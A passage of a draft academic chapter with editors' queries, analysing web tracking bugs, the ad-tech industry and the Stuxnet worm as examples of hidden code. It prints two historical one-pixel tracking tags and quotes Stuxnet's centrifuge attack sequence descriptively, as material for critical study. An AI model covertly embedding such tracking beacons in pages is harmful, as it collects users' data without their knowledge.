&lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence (Madrigal, 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012).&amp;amp;nbsp; These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the ChartBeat company ( [http://chartbeat.com] (http://chartbeat.com/)), it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs (Ghostery 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code and which is used to essentially shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal 2012). [Eds: please check that the singlee and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [Amazon](http://www.businessinsider.com/blackboard/amazon) (e-commerce) is generating $189 per user, at [Google](http://www.businessinsider.com/blackboard/google) (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [AT&amp;amp;amp;T](http://www.att.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [Right Media](http://www.rightmedia.com/)&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [Burst Media](http://www.burstmedia.com/ )&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types campaigns. Example: [The New York Times](http://www.nytimes.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [BlueKai](http://www.bluekai.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [Experian](http://www.experian.com/) &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [ROILabs](http://www.roilabs.com/) &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [Safecount](http://www.safecount.net/) &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [Google Analytics](http://www.google.com/analytics/) &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [FetchBack](http://www.fetchback.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [Invite Media](http://www.invitemedia.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [AdMeld](http://www.admeld.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [DoubleClick DART](http://www.doubleclick.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [MediaCom](http://www.mediacom.com/en/home.aspx)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [ClickForensics](http://www.clickforensics.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [Better Advertising](http://www.betteradvertising.com/)&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma 2010)'' &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform and variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [Turn Media](http://www.turn.com/) is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [BlueKai](http://www.bluekai.com/), [TargusInfo](http://www.targusinfo.com/), [eXelate](http://www.exelate.com/new/index.html), and others (Ghostery 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [readnotify.com](http://readnotify.com/) to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers 2006, Fried 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker 2012). &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called PersianStat ([http://www.persianstat.ir/](http://www.persianstat.com/) ), which claims “an eye on 1091622 websites”, an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprisingly to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies, Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them (Garber 2012, Pew 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent by which that users are just not aware of the subterranean depths of their computational devices and the ability for these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that meet its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki 2011, mmpc2 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first “weaponized” computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller (60minutes 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBSNews 2010). Later, a ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (AP 2012). The Stuxnet worm is also interesting because it also has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zett (2011) explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz (Zetter 2011). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government, he says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross 2011). Indeed, the complexities and structure of the worm mean that estimates are that at least thirty people would have been working on it simultaneously to build such a worm (Zetter 2010). Especially one that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens – in actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did.’ (Zetter 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60minutes 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges (60minutes 2012a). &amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to “Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively” (Markoff and Sanger 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60minutes 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins 2011).[10] As Alexander Gostev, reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future (Gostev 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
